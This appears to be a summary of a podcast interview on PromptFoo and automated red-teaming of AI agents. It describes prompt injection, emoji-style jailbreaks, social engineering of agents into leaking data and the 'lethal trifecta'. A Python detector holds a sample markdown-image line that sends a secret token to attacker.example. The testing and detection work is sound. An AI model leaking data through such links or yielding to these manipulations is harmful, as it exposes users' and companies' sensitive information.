Key Takeaways
- AI agent adoption is accelerating, with 2026 anticipated as a pivotal year for deployment.
- Traditional security methods are inadequate for AI agents, whose attack surface is conversational.
- PromptFoo enables proactive AI agent security testing, simulating adversarial conversations before deployment.
- Vulnerabilities like the "lethal trifecta" and creative jailbreaks highlight novel AI security challenges.
- Automated red-teaming simulates human social engineering tactics to identify AI agent weaknesses.
Deep Dive
- The year 2026 is projected to see a significant increase in AI agent deployment and associated security testing.
- Traditional security methods, focused on code, are inadequate for AI agents, whose attack surface is conversational and susceptible to social engineering.
- Ian Webster founded PromptFoo after encountering security challenges with an AI agent used by 200 million Discord users.
- Fortune 10 companies now utilize PromptFoo to simulate adversarial conversations and prevent issues like data leaks before AI agent deployment.
- PromptFoo, initially an open-source tool for Gen AI testing, is increasingly integrated into the development cycle as a security measure.
- Efforts are underway to embed AI security checks into CI/CD pipelines and developer IDEs.
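The CI/CD integration described above could look something like the following GitHub Actions job. This is a hedged sketch only: the job layout, step names, and the `npx promptfoo@latest redteam run` invocation are assumptions based on promptfoo's documented CLI, so verify the exact command syntax and required secrets against the current promptfoo documentation.

```yaml
# Hypothetical CI job: run promptfoo's adversarial test suite on every PR.
name: ai-redteam
on: [pull_request]
jobs:
  redteam:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - name: Run adversarial conversation tests
        # A non-zero exit code fails the build, blocking the deploy.
        run: npx promptfoo@latest redteam run
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
```

Gating the pipeline on the scan's exit code is what turns red-teaming from a one-off audit into a routine pre-deployment check.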
- The guest predicts AI adoption cycles will be significantly faster than the cloud's roughly ten-year adoption curve.
- Common AI agent vulnerabilities include prompt injections, jailbreaks, and data leakage, a confluence of identity and API security.
- The "lethal trifecta" security model holds that untrusted user input, access to sensitive data, and an exfiltration channel together are what turn an AI agent into a security incident.
- Untrusted data can be introduced indirectly via web browsing or document uploads.
- Exfiltration channels can be subtle, such as markdown rendering within an AI's output.
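The trifecta and the markdown exfiltration channel above can be sketched in a few lines. This is a minimal illustration, not PromptFoo's implementation: the risk flags, the regex, and the example reply are all invented here. The key idea is that a markdown image whose URL carries query parameters can silently leak data when a client auto-renders the agent's output.

```python
import re

# Markdown image whose URL has query parameters -- a potential exfil channel,
# since rendering it sends the parameters to an attacker-controlled server.
MD_IMAGE_WITH_PARAMS = re.compile(r"!\[[^\]]*\]\(\s*(https?://[^)\s]+\?[^)\s]+)\)")

def trifecta_risk(handles_untrusted_input: bool,
                  touches_sensitive_data: bool,
                  has_exfil_channel: bool) -> bool:
    """All three conditions together create an incident-capable agent."""
    return handles_untrusted_input and touches_sensitive_data and has_exfil_channel

def find_exfil_urls(model_output: str) -> list[str]:
    """Flag markdown images that could leak data through their URLs."""
    return MD_IMAGE_WITH_PARAMS.findall(model_output)

# Hypothetical agent reply smuggling a token out via an image URL.
reply = "Here you go! ![chart](https://attacker.example/p.png?d=SECRET_TOKEN)"
print(trifecta_risk(True, True, bool(find_exfil_urls(reply))))  # -> True
print(find_exfil_urls(reply))
```

Removing any one leg of the trifecta (e.g. stripping renderable URLs from output) drops the risk check to `False`, which is why mitigations often target the exfiltration channel rather than the model itself.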
- AI exploits differ from traditional ones: unlike classic SQL injection, which has deterministic fixes, an agent's controls can be bypassed through coercion and indirect natural-language methods.
- PromptFoo addresses scenarios like a SaaS provider's incident where an AI interface inadvertently exposed customer information due to unconstrained data access.
- Prompt injections and jailbreaks are techniques used to exploit access control issues or cause data leaks, not end goals themselves.
- PromptFoo simulates human red-teamers by conducting up to 30,000 simulated conversations to identify vulnerabilities.
- The tool generates natural language attacks tailored to specific business contexts and target applications, escalating over 30-50 messages.
- Unexpected jailbreaks, like those using millennial chat-style language and emojis, can bypass an AI's guardrails and reinforcement learning defenses.
- Pairing persuasive, creative language with systems that mix deterministic code and non-deterministic model behavior multiplies the potential for novel attacks.
- AI agents are exploited through social engineering tactics, such as an AI being persuaded to leak data by a user claiming an urgent request.
- Human red-teaming is slow, requiring repetitive conversations and constant restarts; automation addresses this by covering a far wider attack surface.
- The guest's AI agent at Discord, rolled out to 200 million users in 2023, surfaced significant security, trust, and safety issues.
- Those challenges, including jailbreaking and the "lethal trifecta," directly informed the development of PromptFoo.
- The current AI security landscape parallels historical platform shifts, where solutions often emerge from engineers solving their own problems.
- The guest recommends PromptFoo as an open-source tool for AI safety and security evaluations, predicting a significant year ahead for AI development.